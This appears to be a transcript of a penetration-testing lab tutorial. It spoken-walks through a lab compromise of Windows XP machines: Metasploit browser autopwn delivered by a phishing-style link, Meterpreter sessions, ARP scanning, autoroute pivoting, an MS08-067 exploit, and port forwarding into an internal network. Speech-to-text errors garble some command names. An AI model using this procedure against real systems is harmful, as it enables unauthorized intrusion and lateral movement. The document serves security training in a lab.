In this section, we'll be seeing how to do intranet hacking. So you should have all three of your VMs running. So first let's open our XP clone and then open XAMPP and then start Apache and then also MySQL. And then go to start Internet Explorer, sorry, Firefox. And Firefox is loaded. So I'll give localhost and you can see it's taking me to the XAMPP default screen. So let's now go to the Kali machine, go to the terminal, and then open up MSF console. And MSF has opened. So I just clear the screen and then give use auxiliary /server/browser _ autopon and hit enter. So it has loaded. And then I'm going to give show options and this will give me the different options that I need to fill. So I have to set lhost, server host, and then URI path. So I'll open terminal again. Now I'll type if config and this should give me the IP address of the Kali machine. So it is 192.168.56.102. So I'll set it over here. Clear the screen first and then give set lhost space the IP address of the Kali machine 192.168.56.102 and then set SRV host 192.168.56.102 and then we're going to set the URI path. Just give / and that will be the root of the server. So and then I'll just give run and enter. So it's loading. So this might take some time. It has to load every single exploit. So now it's saying server has started. So it has found 62 different exploit modules and it's ready in that URL. So let's open our original XP over here and start command prompt and then IP config. You can see it has a 192 IP address and a 172 IP address. And let's go to all programs, Internet Explorer. Let's imagine that the attacker has sent the victim this link and he has convinced him to open it. He might have shortened this link using a link shortener, or he might even use a real domain to host this exploit. So that's the IP address of the Kali machine, 8080, and then port 8080. And then the victim's going to hit enter, and you can see down over here the different exploits are loading. and if you see over here, it's showing that all of them are running. So it's saying session ID 3 is open, session ID 4 is open, session ID 5 is open. So this is how many times different exploits have worked. So it's going to run all the exploits, and it's finished. I'll just clear the screen and then give sessions, and you can see there are 6 active sessions. That means 6 times it has been exploited using 6 different type of vulnerabilities, and you have 6 Metasploit shells in that computer. So I'll just clear the screen again. So we'll use the first session, sessions-i1. So this will open the first session. So you have your Metasploit shell over here. We'll give this info. So this gives the computer name, the OS, the details over here. And then give IP config. And you can see there are 2 IP addresses for this XP machine that has been exploited. So in interface 2 over here, there's a 192 IP address. And this is the IP address in which the attacker is connecting to the victim, this XP machine. And there is a 172 IP address. This is the internal network. So this computer is connected to both the internet and the internal network. So let's copy this and then go to leaf pad. So this is the IP address of the compromised XP. This is the other IP address in the local intranet. So let's open terminal again and then give ping -c1 and let's try the first IP address. So you can see it has replied back. And it's reachable. Let's try the second IP address. Same command, ping -c1 and then the other IP address. So now it's saying network is unreachable because it's in an internal network. So we'll just name it local network and it's unreachable. So let's go back to the Metwitter. Now we'll use the ARP scanner. So I'll go over to Metwitter again and run space ARP underscore scanner and space -h. This will give us the help information. So you can see the help details over here. So over here I can specify a range to scan. So I'll give run space ARP underscore scanner and then -r, and this range over here, that 172 range, and I'll give 1.1 and /24. This is the entire subnet will get scanned. So I'll hit enter again, and you can see it has found 4 machines in that network over here. So we just copy that and then paste it. So we don't need that MAC information, so we'll just remove it. So we have 4 IP addresses over here now. We know that 102 is the IP address of the XP machine, so we can remove that. So these are the unknown machines. So we'll keep them in order like this. So we'll just consider this to be the second target. So I'll create the screen again in the terminal and then ping -c1 . Second target over here. So you can see saying network is unreachable. So you can see the 192 IP address is reachable, but 172 is not reachable. So let's go back to our Metwitter shell and give run space auto route space -h. So this will give us help information about this command. So you can use autoroute to autoroute any sort of traffic sent from the attacker to a subnet. So I'll give run space autoroute, and we're going to give a subnet. So space -s 172.16.1.1 and space -n. I'll give 255.255.255.0 for the net mask. Hit enter. And you can see it has added a route. So you can see it has added a route to this subnet via 192.168.56.101. So this IP address is reachable by us. So that will be our pivoting point. So we just send it to the background by giving the command background. Now I'll give use auxiliary / scanner / port scan / TCP. Hit enter, and you can see now it's being used. Clear the screen and then give show options. So I can fill in the options over here. So there's a port option over here, a rhost option over here, in which you specify the victim. So we'll give set ports to 445. So this will only scan port 445. And then set rhost to the IP address of the second target. Then paste it, enter. So now I'll give run. So you can see it's saying TCP open, so that port is open. Clear the screen again. So I'll give use exploit / windows / smb / the MS08067 net API exploit. So because that port is open, we can try to use this exploit. So we'll set the rhost again to the IP address of the second target. And then set payload. So here we're gonna specify the payload. We're gonna give windows / metpeter / bind _ TCP, the bind TCP payload. and then give exploit. So you can see it's starting, it's detecting the target, and it's attempting to trigger the vulnerability. So you can see MetReader session 7 has been opened, and I'm inside the MetReader session. So I'll give sysinfo, and you can see it's a Windows XP computer and the details over here. But if I type ipconfig, you can see I get the IP address of the 172 network. So just scroll down, you can see 172. So this is the XP cloned machine that you're inside right now. So I'll give netstat space -abn. So you can see the different connections this computer is having. So you can see there is a httpd.exe, which is Apache, and it's on port 80. So I'll give port forward fwd space -h. So this will give us the help information. So this is how you use port forward. So you can set the local host to listen on, the local port to listen on, and the local remote port to connect to, and the remote host to connect to. So I'll give port fwd, add, and then capital L the local host, small l the port, and then small r the IP address over here. So 172.116.1.101, and then -p and port as 80. Hit enter. So you can see a TCP relay has been created between this IP and this port to this IP and this port. So let's open the Firefox, or Iceweasel in this example. And then I give 127.0.0.1 and port 80. So this will connect to that IP address over there, and you can see that XAMPP control, XAMPP default screen that you saw in that XP cloned machine, which is in the local network, being shown over here in the public network. Thank you.